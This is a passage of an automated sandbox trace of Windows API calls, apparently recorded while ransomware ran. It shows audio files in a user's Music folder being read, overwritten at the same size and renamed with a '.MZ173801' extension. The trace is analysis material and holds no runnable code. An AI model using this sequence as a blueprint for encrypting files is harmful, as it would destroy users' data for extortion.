jNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.663] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0117.663] GetCurrentThreadId () returned 0x1358 [0117.663] GetCurrentThreadId () returned 0x1358 [0117.663] GetCurrentThreadId () returned 0x1358 [0117.664] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0117.664] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0117.664] GetCurrentThreadId () returned 0x1358 [0117.664] GetCurrentThreadId () returned 0x1358 [0117.664] GetCurrentThreadId () returned 0x1358 [0117.664] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\W5nBFs1pwVaw l7.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\w5nbfs1pwvaw l7.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.664] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee74*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee74*=0) returned 0x0 [0117.664] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.664] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x8a23 [0117.665] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19ee6c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19ee6c*=0) returned 0x0 [0117.665] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0x8a23, lpNumberOfBytesRead=0x19ee80, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19ee80*=0x8a23, lpOverlapped=0x0) returned 1 [0117.666] CloseHandle (hObject=0x40c) returned 1 [0117.666] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\W5nBFs1pwVaw l7.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\w5nbfs1pwvaw l7.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0117.667] WriteFile (in: hFile=0x40c, lpBuffer=0x23a47a0*, nNumberOfBytesToWrite=0x8a23, lpNumberOfBytesWritten=0x19ee8c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesWritten=0x19ee8c*=0x8a23, lpOverlapped=0x0) returned 1 [0117.669] CloseHandle (hObject=0x40c) returned 1 [0117.670] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\W5nBFs1pwVaw l7.wav" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\w5nbfs1pwvaw l7.wav"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\W5nBFs1pwVaw l7.wav.MZ173801" (normalized: "c:\\users\\fd1hvy\\music\\stszjlzazd-p\\1zion8xjlgtdea8sdujv\\atjrrwovtu\\ds2vva7r\\w5nbfs1pwvaw l7.wav.mz173801")) returned 1 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] GetCurrentThreadId () returned 0x1358 [0117.671] FindNextFileW (in: hFindFile=0xa1baf0, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256e8eb0, ftCreationTime.dwHighDateTime=0x1d5e5ed, ftLastAccessTime.dwLowDateTime=0xc22bc580, ftLastAccessTime.dwHighDateTime=0x1d5ef23, ftLastWriteTime.dwLowDateTime=0xc22bc580, ftLastWriteTime.dwHighDateTime=0x1d5ef23, nFileSizeHigh=0x0, nFileSizeLow=0x8a23, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="W5nBFs1pwVaw l7.wav", cAlternateFileName="W5NBFS~1.WAV")) returned 0 [0117.671] GetLastError () returned 0x12 [0117.671] FindClose (in: hFindFile=0xa1baf0 | out: hFindFile=0xa1baf0) returned 1 [0117.671] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\ATjrrwOvtU\\Ds2vVA7R\\*.*", lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0xa768dc28, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa768dc28, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName=".", cAlternateFileName="")) returned 0xa1bce8 [0117.671] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef30 | out: lpLocalFileTime=0x19ef30) returned 1 [0117.671] FileTimeToDosDateTime (in: lpFileTime=0x19ef30, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.671] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x193b0b40, ftCreationTime.dwHighDateTime=0x1d5e990, ftLastAccessTime.dwLowDateTime=0xa768dc28, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa768dc28, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="..", cAlternateFileName="")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80f55360, ftCreationTime.dwHighDateTime=0x1d5e81b, ftLastAccessTime.dwLowDateTime=0x46d66790, ftLastAccessTime.dwHighDateTime=0x1d5e213, ftLastWriteTime.dwLowDateTime=0xa7510598, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd55e, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="H0Fbjn1UaDFSWci6YS.mp3.MZ173801", cAlternateFileName="H0FBJN~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff6063d0, ftCreationTime.dwHighDateTime=0x1d5ec7a, ftLastAccessTime.dwLowDateTime=0x502dffc0, ftLastAccessTime.dwHighDateTime=0x1d5e348, ftLastWriteTime.dwLowDateTime=0xa7510598, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x9d3, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="o0b7l4H.m4a.MZ173801", cAlternateFileName="O0B7L4~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256e8eb0, ftCreationTime.dwHighDateTime=0x1d5e5ed, ftLastAccessTime.dwLowDateTime=0xc22bc580, ftLastAccessTime.dwHighDateTime=0x1d5ef23, ftLastWriteTime.dwLowDateTime=0xa768dc28, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x8a23, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="W5nBFs1pwVaw l7.wav.MZ173801", cAlternateFileName="W5NBFS~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19efcc, lpLocalFileTime=0x19ef2c | out: lpLocalFileTime=0x19ef2c) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19ef2c, lpFatDate=0x19ef9a, lpFatTime=0x19ef98 | out: lpFatDate=0x19ef9a, lpFatTime=0x19ef98) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1bce8, lpFindFileData=0x19efb8 | out: lpFindFileData=0x19efb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x256e8eb0, ftCreationTime.dwHighDateTime=0x1d5e5ed, ftLastAccessTime.dwLowDateTime=0xc22bc580, ftLastAccessTime.dwHighDateTime=0x1d5ef23, ftLastWriteTime.dwLowDateTime=0xa768dc28, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x8a23, dwReserved0=0x19f014, dwReserved1=0x77a601e9, cFileName="W5nBFs1pwVaw l7.wav.MZ173801", cAlternateFileName="W5NBFS~1.MZ1")) returned 0 [0117.672] GetLastError () returned 0x12 [0117.672] FindClose (in: hFindFile=0xa1bce8 | out: hFindFile=0xa1bce8) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x978516f0, ftCreationTime.dwHighDateTime=0x1d5ea51, ftLastAccessTime.dwLowDateTime=0x981c90b0, ftLastAccessTime.dwHighDateTime=0x1d5ec2d, ftLastWriteTime.dwLowDateTime=0xa749df9e, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x15a8a, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="LWQBu.mp3.MZ173801", cAlternateFileName="LWQBUM~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63e858f0, ftCreationTime.dwHighDateTime=0x1d5e3cd, ftLastAccessTime.dwLowDateTime=0xc69396d0, ftLastAccessTime.dwHighDateTime=0x1d5ea1d, ftLastWriteTime.dwLowDateTime=0xa74c41b7, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xd55b, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="o87Ff8jxDauutKhIzSH.m4a.MZ173801", cAlternateFileName="O87FF8~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee99b50, ftCreationTime.dwHighDateTime=0x1d5e131, ftLastAccessTime.dwLowDateTime=0x59d9f570, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xa74ea2c0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="_HdsGmu6OGd.wav.MZ173801", cAlternateFileName="_HDSGM~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0117.672] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1be00, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaee99b50, ftCreationTime.dwHighDateTime=0x1d5e131, ftLastAccessTime.dwLowDateTime=0x59d9f570, ftLastAccessTime.dwHighDateTime=0x1d5e56d, ftLastWriteTime.dwLowDateTime=0xa74ea2c0, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x618, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="_HdsGmu6OGd.wav.MZ173801", cAlternateFileName="_HDSGM~1.MZ1")) returned 0 [0117.672] GetLastError () returned 0x12 [0117.672] FindClose (in: hFindFile=0xa1be00 | out: hFindFile=0xa1be00) returned 1 [0117.672] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe80d1f90, ftCreationTime.dwHighDateTime=0x1d5e138, ftLastAccessTime.dwLowDateTime=0x44ed2440, ftLastAccessTime.dwHighDateTime=0x1d5e6ec, ftLastWriteTime.dwLowDateTime=0xa72fe01f, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xecb1, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="b79RtRRk9TDjgGdhgjZ.wav.MZ173801", cAlternateFileName="B79RTR~1.MZ1")) returned 1 [0117.672] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.673] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.673] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc543ee90, ftCreationTime.dwHighDateTime=0x1d5e6aa, ftLastAccessTime.dwLowDateTime=0x8ff6ae40, ftLastAccessTime.dwHighDateTime=0x1d5ea96, ftLastWriteTime.dwLowDateTime=0xa7325cf6, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x18c9d, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="IOVI.m4a.MZ173801", cAlternateFileName="IOVIM4~1.MZ1")) returned 1 [0117.673] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.673] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.673] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbe0480, ftCreationTime.dwHighDateTime=0x1d5f07e, ftLastAccessTime.dwLowDateTime=0x2a8669c0, ftLastAccessTime.dwHighDateTime=0x1d5e603, ftLastWriteTime.dwLowDateTime=0xa7346abe, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xb048, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="rUWxi6pNUN.wav.MZ173801", cAlternateFileName="RUWXI6~1.MZ1")) returned 1 [0117.673] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.673] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.673] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f550 | out: lpFindFileData=0x19f550*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19f5ac, dwReserved1=0x77a601e9, cFileName="uO40eItURrDuO", cAlternateFileName="UO40EI~1")) returned 1 [0117.673] FileTimeToLocalFileTime (in: lpFileTime=0x19f564, lpLocalFileTime=0x19f4c4 | out: lpLocalFileTime=0x19f4c4) returned 1 [0117.673] FileTimeToDosDateTime (in: lpFileTime=0x19f4c4, lpFatDate=0x19f532, lpFatTime=0x19f530 | out: lpFatDate=0x19f532, lpFatTime=0x19f530) returned 1 [0117.673] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\stszJlZAZD-p\\1Zion8xjlGTdeA8sDujv\\uO40eItURrDuO\\*.*", lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa5b9c520, ftCreationTime.dwHighDateTime=0x1d5f0c0, ftLastAccessTime.dwLowDateTime=0x51bcc6b0, ftLastAccessTime.dwHighDateTime=0x1d5e4b4, ftLastWriteTime.dwLowDateTime=0x51bcc6b0, ftLastWriteTime.dwHighDateTime=0x1d5e4b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName=".", cAlternateFileName="")) returned 0xa1bd90 [0117.673] FindNextFileW (in: hFindFile=0xa1bd90, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x10, 